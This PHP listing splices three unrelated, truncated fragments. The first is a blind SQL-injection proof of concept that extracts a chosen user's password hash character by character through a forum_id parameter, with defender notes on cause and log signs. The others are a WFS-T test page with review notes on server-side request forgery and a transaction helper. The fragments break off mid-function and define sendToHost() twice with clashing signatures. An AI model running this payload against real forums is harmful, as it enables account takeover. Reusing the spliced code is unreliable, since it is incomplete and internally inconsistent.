// Fragment of a proof-of-concept that probes a forum script with boolean SQL
// conditions injected through the forum_id POST parameter. The listing starts
// mid-script: $the_userid_to_hack, $server, $script and $data_to_match are set
// outside this fragment, and the sendToHost() definition at the end is cut off.
//
// Defender notes:
// - Root cause (inferred from the payload shape): forum_id reaches a SQL
//   statement as an unquoted number. Casting it to an integer or binding it as
//   a parameter removes the injection point.
// - In server logs this appears as a burst of POSTs to one script whose
//   forum_id value contains "or", "mid(", "char(" and a trailing "/*".
// - The loop bound (32 positions) and the hex candidates are consistent with a
//   32-character hex digest in user_password (presumably unsalted MD5 - confirm
//   against the schema); a salted, slow password hash limits what a leaked
//   column is worth.

// Candidate table: each key is a hex digit and each value is its SQL char()
// form. Only 5-9 and a-f are visible here; presumably 0-4 are set just before
// this fragment.
$checkchar[5] = "char(53)";
$checkchar[6] = "char(54)";
$checkchar[7] = "char(55)";
$checkchar[8] = "char(56)";
$checkchar[9] = "char(57)";
$checkchar[a] = "char(97)";
$checkchar[b] = "char(98)";
$checkchar[c] = "char(99)";
$checkchar[d] = "char(100)";
$checkchar[e] = "char(101)";
$checkchar[f] = "char(102)";

// One pass per character position 1..32 of the user_password column.
for ($i = 1; $i < 33; $i++) {
    reset($checkchar);
    while (list($i2, $i2val) = @each($checkchar)) {
        // The condition is appended to forum_id; the trailing "/*" opens a SQL
        // comment so the rest of the original statement is ignored.
        $vars = "forum_id=1+or+user_id={$the_userid_to_hack}+and+mid(user_password,{$i},1)={$checkchar[$i2]}/*";
        $data = sendToHost("{$server}", 'post', "{$script}", "{$vars}");
        // The response body is the only signal used: it is matched
        // case-insensitively against $data_to_match.
        if (eregi("{$data_to_match}", "{$data}")) {
            //echo("<b>$i2</b>");
        } else {
            // First candidate whose response does not match: print the position
            // and candidate, then move on to the next position.
            echo "<br>{$i}= {$i2}";
            flush();
            break;
        }
    }
}

// Hand-built HTTP request over a plain TCP socket to port 80. The listing ends
// inside this function, so the rest of the request and the response handling
// are not shown.
function sendToHost($host, $method, $path, $data, $useragent = 1) {
    $method = strtoupper($method);
    $fp = fsockopen($host, 80);
    fputs($fp, "{$method} {$path} HTTP/1.1\n");
    fputs($fp, "Host: {$host}\n");
// Fragment of a WFS-T test page. When both request parameters are present, it
// sends "filter" as a POST body to the URL given in "onlineresource" and prints
// the escaped response. The listing starts inside the HTML head and ends inside
// sendToHost().
//
// NOTE(review): the target host and port come straight from request input and
// end up in fsockopen() with no allowlist, so any caller of this page can make
// the server open connections to hosts and ports of their choosing and send a
// body of their choosing (server-side request forgery). Restrict
// "onlineresource" to the configured WFS endpoints and put the page behind
// authentication, or do not deploy test pages like this one.
echo '<meta http-equiv="Content-Type" content="text/html; charset=' . CHARSET . '">';
?> <title>Test WFS-T operated by CCGIS</title> </head> <?php
// "onlineresource" is compared without isset(), so a request that carries only
// "filter" raises an undefined-index notice/warning before the test fails.
if (isset($_REQUEST["filter"]) && $_REQUEST["filter"] != "" && $_REQUEST["onlineresource"] != '') {
    // parse_url() returns false for malformed input and omits "port" and "path"
    // when the URL has none; none of these cases is checked here.
    $arURL = parse_url($_REQUEST["onlineresource"]);
    $host = $arURL["host"];
    $port = $arURL["port"];
    if ($port == '') {
        // The scheme is never read, so an https:// URL without a port also
        // falls back to port 80.
        $port = 80;
    }
    $path = $arURL["path"];
    $method = "POST";
    // presumably undoes magic-quotes escaping of the request body - confirm
    $data = stripslashes($_REQUEST["filter"]);
    $out = sendToHost($host, $port, $method, html_entity_decode($path), $data);
    echo "-------------------get-------------<br>";
    // The remote response is HTML-escaped before it is printed.
    echo htmlentities($out);
    echo "-------------------end of get-------------<br>";
}

// Prints the outgoing request for debugging, then opens a socket to
// $host:$port. The listing ends right after fsockopen(), so the request
// writing, response reading and return value are not visible here.
function sendToHost($host, $port, $method, $path, $data) {
    echo "-------------------send-------------<br>";
    // NOTE(review): only $data is escaped. $host and $path are derived from the
    // "onlineresource" request parameter at the call site above ($path after
    // html_entity_decode()) and are echoed raw into the HTML page, so markup in
    // the URL is reflected to the browser. Wrap $host, $method and $path in
    // htmlspecialchars() as is already done for $data.
    echo $host . "<br>" . $method . "<br>" . $path . "<br>" . htmlspecialchars($data) . "<br>";
    echo "-------------------end of send-------------<br>";
    $buf = '';
    if (empty($method)) {
        $method = 'POST';
    }
    $method = mb_strtoupper($method);
    // The result of fsockopen() is not checked in the visible part.
    $fp = fsockopen($host, $port);
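/**
 * Sends the data of a WFS Transaction to the given URL and echoes the response.
 *
 * Only the host, port and path components of $url are used; the scheme and
 * any query string are not read. The request is delegated to sendToHost() as
 * a POST. Everything before the first "<" and after the last ">" of the
 * returned string is removed before it is echoed.
 *
 * NOTE(review): $url decides which host and port the server connects to. If
 * callers pass a request-supplied URL, check it against the configured WFS
 * endpoints before calling this function (server-side request forgery).
 * NOTE(review): because the scheme is ignored, an https:// URL without an
 * explicit port is sent to port 80 - confirm whether sendToHost() speaks TLS.
 * NOTE(review): the remote response is echoed without escaping; presumably
 * it is XML read by a client script - confirm the response content type so
 * that a hostile endpoint cannot inject markup into an HTML page.
 *
 * @param string $url  URL to send the WFS Transaction to
 * @param string $data WFS Transaction data
 * @return void
 */
function doTransaction($url, $data)
{
    $arURL = parse_url($url);

    // parse_url() returns false for seriously malformed URLs and omits the
    // "host" key for relative ones; without a host there is nothing to
    // connect to, so stop here instead of handing null to the socket helper.
    // The URL itself is deliberately left out of the message.
    if (!is_array($arURL) || !isset($arURL["host"]) || $arURL["host"] == '') {
        trigger_error("doTransaction: URL has no usable host, nothing sent", E_USER_WARNING);
        return;
    }
    $host = $arURL["host"];

    // "port" and "path" are optional in parse_url()'s result; reading them
    // unguarded raises an undefined-index notice/warning and, for the path,
    // produces an empty request target.
    $port = isset($arURL["port"]) ? $arURL["port"] : 80;
    $path = isset($arURL["path"]) ? $arURL["path"] : "/";
    $method = "POST";

    $result = sendToHost($host, $port, $method, html_entity_decode($path), $data);

    //delete header from result
    $result = mb_eregi_replace("^[^<]*", "", $result);
    $result = mb_eregi_replace("[^>]*\$", "", $result);
    echo $result;
}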